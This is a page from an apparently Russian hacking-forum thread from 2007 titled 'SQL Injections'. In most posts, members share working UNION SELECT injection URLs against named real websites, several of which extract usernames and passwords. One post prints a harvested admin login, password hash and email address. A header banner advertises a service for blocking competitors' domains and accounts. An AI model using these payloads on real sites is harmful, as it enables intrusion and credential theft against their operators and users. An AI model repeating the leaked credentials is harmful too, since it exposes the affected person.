Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 87 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#861

11.03.2007, 00:37

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Spyder, http://www.multidmedia.com/admin/ у меня тут админка. я хз что с тобой

#862

11.03.2007, 00:38

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Отправить сообщение для Colkru с помощью ICQ

http://www.spoono.com/php/tutorials/tutorial.php?id=-1+union+select+1,2,concat(user,char(58),password), 4,5,6,7,8+from+users/*

#863

11.03.2007, 00:43

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Код:

http://www.nero.com/eng/showpress.php?id=1015+order+by+13

Nero однако...хотя когда селект делаю не прокатывает

ну хоть что-то

Код:

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,3,4,5,6,7

Код:

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги

Последний раз редактировалось n0ne; 11.03.2007 в 01:05..

#864

11.03.2007, 01:18

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

2 n0ne
думаю, с парсингом проблем не будет

Код:

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user

база юзеров в формате login:рassword:email
admin f1a81d782dea6a19bdca383bffe68452 ez@noreality.ch

Последний раз редактировалось n1†R0x; 11.03.2007 в 01:24..

#865

11.03.2007, 02:09

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от n0ne

Код:

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги

бедный директор...сколько его мучают, а он всё он-лайн бедняга

#866

11.03.2007, 03:34

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

_http://www.toumaz.com/news/news.php?id=1000+union+select+1,2,3,version(),user (),6/*

_http://www.uecmoedling.at/news/news.php?id=90+union+select+111,222,333,user(),555 ,666,version(),888,999/*

_http://www.aoecs.org/news/news.php?id=30+union+select+1,2,version(),user(),5 ,6,7,8/*

Последний раз редактировалось -=lebed=-; 11.03.2007 в 05:27..

#867

11.03.2007, 11:46

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

http://www.happyland-drink.ru/brands.php?id=46%20AND%201=0%20UNION%20SELECT%201, user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25/*

#868

11.03.2007, 12:09

~~mal4Ik~~

Banned

Регистрация: 12.02.2007

Сообщений: 19

Провел на форуме:
393694

Репутация: 11

Отправить сообщение для mal4Ik с помощью ICQ

модный в своих кругах питерский сайт:

http://www.spbclub.ru/cgi-bin/content/show.php?dep=reviews&review=49+union+SELECT+null,n ull,password,null,null,null,null+FROM+users

#869

11.03.2007, 12:21

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

_http://www.alutis.lt/news/news.php?id=-1+union+select+1,2,3,user(),version()/*

P.S. 4 поле, например user() можно посмотреть в имени рисунка (свойства картинки).

_http://www.austadiums.com/news/news.php?id=-1+union+select+user(),version()/*

_http://www.verticalworld.net/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
количество колонок подобрал, но имхо нет прав на добавление новости, поэтому sql-inj не работает...

Последний раз редактировалось -=lebed=-; 11.03.2007 в 13:34..

#870

11.03.2007, 12:21

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

PHP код:


		
			
http://www.myminsk.com/catalog/counters.php?id=-1+union+select+1,2,table_name,4+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

Цитата:

http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+u sers/*

http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+p hpbb_users/*

PHP код:


		
			
http://dicom.spb.ru/tech/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

PHP код:


		
			
http://www.phpbuddy.com/article.php?id=-1+union+select+version(),2,user(),4,5,6/*

PHP код:


		
			
http://www.cgekuban.ru/tenders/arti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Последний раз редактировалось Colkru; 11.03.2007 в 14:27..

Страница 87 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход